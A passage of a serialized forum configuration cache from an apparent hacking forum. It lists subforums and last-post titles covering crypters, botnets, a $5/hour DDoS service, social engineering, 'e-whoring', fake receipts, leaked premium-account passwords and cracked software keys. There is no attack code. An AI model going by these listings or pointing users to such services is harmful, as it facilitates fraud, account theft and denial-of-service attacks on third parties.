cracked\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"2\";s:10:\"rulestitle\";s:5:\"Rules\";s:5:\"rules\";s:209:\"1. Use the search button to see if the program is already posted or not. Updated versions are allowed. 2. Do not request programs here. 3. All programs must contain a virus scan, do NOT upload on virustotal.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:41:\"1339992636_preferences-system-network.png\";s:18:\"ForumsRequirements\";s:1:\"5\";}i:20;a:37:{s:3:\"fid\";s:2:\"20\";s:4:\"name\";s:44:\"File Protection, Crypters, Cryptography etc \";s:11:\"description\";s:137:\"For discussion on keys, ciphers, and algorithms often used to keep information secret. Encryption is the art of concealing data and code.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,20\";s:9:\"disporder\";s:1:\"7\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:39:\"[3/14] War - Crypter [ScanTime] by cris\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:29:\"application-pgp-encrypted.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:21;a:37:{s:3:\"fid\";s:2:\"21\";s:4:\"name\";s:29:\"Botnets and IRC Bots, Zombies\";s:11:\"description\";s:46:\"Botnets, IRC Bots, Zombies and DDoS discussion\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,21\";s:9:\"disporder\";s:1:\"8\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"4\";s:15:\"lastpostsubject\";s:56:\"[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"intranet.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:16;a:37:{s:3:\"fid\";s:2:\"16\";s:4:\"name\";s:41:\"Social Engineering and Human Manipulation\";s:11:\"description\";s:115:\"Social Engineering is the art of manipulating people into performing actions or divulging confidential information.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,16\";s:9:\"disporder\";s:1:\"9\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:41:\"[eBook][Special] iTzIpod\'s SEing Tutorial\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"guy_fawkes_mask.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:18;a:37:{s:3:\"fid\";s:2:\"18\";s:4:\"name\";s:28:\"AIM MSN IRC ICQ and IM Hacks\";s:11:\"description\";s:137:\"If you are into exploiting instant messaging systems then we have a perfect forum for you. Post here for AIM hacks and other IM exploits.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,18\";s:9:\"disporder\";s:2:\"10\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"306\";s:15:\"lastpostsubject\";s:26:\"Facebook Blaster Pro v10.0\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:18:\"1339993091_aim.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:43;a:37:{s:3:\"fid\";s:2:\"43\";s:4:\"name\";s:26:\"PIDs, Serials, CD Keys etc\";s:11:\"description\";s:123:\"A place to find all product identifications, Serials, product keys and much more. Post your favourite PID generators here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"10\";s:10:\"parentlist\";s:5:\"10,43\";s:9:\"disporder\";s:2:\"11\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:12:\"Tons of PIDs\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:11:\"barcode.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:59;a:37:{s:3:\"fid\";s:2:\"59\";s:4:\"name\";s:6:\"Ebooks\";s:11:\"description\";s:48:\"Download all electronics books on Hacking here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"12\";s:10:\"parentlist\";s:8:\"10,12,59\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"302\";s:15:\"lastpostsubject\";s:37:\"[Ebook]Make $50+ a day usuing AdSense\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"book.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:17;a:37:{s:3:\"fid\";s:2:\"17\";s:4:\"name\";s:9:\"E-Whoring\";s:11:\"description\";s:78:\"Don\'t know what E-Whoring is? Find out here. **Caution: Adult content warning!\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"16\";s:10:\"parentlist\";s:8:\"10,16,17\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"323\";s:15:\"lastpostsubject\";s:29:\"Camdecoy bitch available here\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"0\";s:14:\"allowvideocode\";s:1:\"0\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:5:\"Rules\";s:5:\"rules\";s:185:\"1. All packs should have at least 2 picture previews. 2. All previews must be censored. 3. No previews directing to other sites. 4. Img & video code has been disabled for this forum.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:24:\"n4d9577fda0944_small.jpg\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:45;a:37:{s:3:\"fid\";s:2:\"45\";s:4:\"name\";s:20:\"SEing Graphical help\";s:11:\"description\";s:27:\"Need a fake receipt or POP?\";s:6:\"linkto\";s:46:\"http://l33thacking.net/forumdisplay.php?fid=44\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"16\";s:10:\"parentlist\";s:8:\"10,16,45\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:16:\"receipt-text.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:23;a:37:{s:3:\"fid\";s:2:\"23\";s:4:\"name\";s:14:\"White Hat Help\";s:11:\"description\";s:83:\"Need to secure your website? Have you infected yourself? This is the right section \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"22\";s:10:\"parentlist\";s:5:\"22,23\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"62\";s:15:\"lastpostsubject\";s:40:\"Think you have an infection? Click Here.\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"borsalino_blanc.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:24;a:37:{s:3:\"fid\";s:2:\"24\";s:4:\"name\";s:27:\"Miscellaneous Computer Talk\";s:11:\"description\";s:52:\"Off topic computer discussions are to be held here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"22\";s:10:\"parentlist\";s:5:\"22,24\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"205\";s:15:\"lastpostsubject\";s:35:\"Windows 8 Officially released 26-10\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:28:\"preferences-system-login.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:25;a:37:{s:3:\"fid\";s:2:\"25\";s:4:\"name\";s:41:\"Computer Protection and Security Breaches\";s:11:\"description\";s:94:\"Find out the latest security alerts and post your topics here related to computer protection. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"22\";s:10:\"parentlist\";s:5:\"22,25\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"8\";s:15:\"lastpostsubject\";s:37:\"[Serials] Malwarebytes Full keys Dump\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"kwikdisk.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:27;a:37:{s:3:\"fid\";s:2:\"27\";s:4:\"name\";s:17:\"Sign up for Elite\";s:11:\"description\";s:88:\"Sign up for Elite Membership here and find out the benefits on upgrading to elite here. \";s:6:\"linkto\";s:34:\"http://l33thacking.com/upgrade.php\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"26\";s:10:\"parentlist\";s:5:\"26,27\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:21:\"user_male_add (1).png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:55;a:37:{s:3:\"fid\";s:2:\"55\";s:4:\"name\";s:17:\"Gay Free Requests\";s:11:\"description\";s:50:\"Need something for free? Post your requests here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"28\";s:10:\"parentlist\";s:8:\"31,28,55\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:23:\"Paypal 1 dollar 50cents\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:6:\"10.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:28;a:37:{s:3:\"fid\";s:2:\"28\";s:4:\"name\";s:21:\"Elite Discussion Area\";s:11:\"description\";s:61:\"For Elite discussions and brags on your new hacks, gifts etc.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,28\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:28:\"New Section Added in VIP tab\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"skull.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:29;a:37:{s:3:\"fid\";s:2:\"29\";s:4:\"name\";s:16:\"Advanced Methods\";s:11:\"description\";s:109:\"Get the exclusive advanced grey hat methods here. This section is for advanced tutorials, guides and ebooks. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,29\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"54\";s:15:\"lastpostsubject\";s:37:\"How to get free XXX passwords! [EASY]\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:135:\"1. Do not post programs, this is for tutorials, guides and ebooks. 2. Do not post content that is already out in the public area on LH\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"atom.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:54;a:37:{s:3:\"fid\";s:2:\"54\";s:4:\"name\";s:16:\"Premium Accounts\";s:11:\"description\";s:126:\"Find access to all premium accounts such as hostings, porn, etc. All threads here must be post here and/or PM me for download.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,54\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"255\";s:15:\"lastpostsubject\";s:50:\"[4 nov]HUGE MIXXX OF WORKING PASSES FOR 4.NOV.2012\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:20:\"Rules for this forum\";s:5:\"rules\";s:125:\"1. Any leechers or password changer on being caught would be permanently banned. 2. No keylog dumps, only premium accounts. \";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:14:\"my-account.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:30;a:37:{s:3:\"fid\";s:2:\"30\";s:4:\"name\";s:17:\"Premium Downloads\";s:11:\"description\";s:168:\"Have a program that you would like to share with premium members only or want to distribute a program here which you don\'t want normal members to have? Post them here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,30\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:31:\"[100% Virus Free] Photoshop 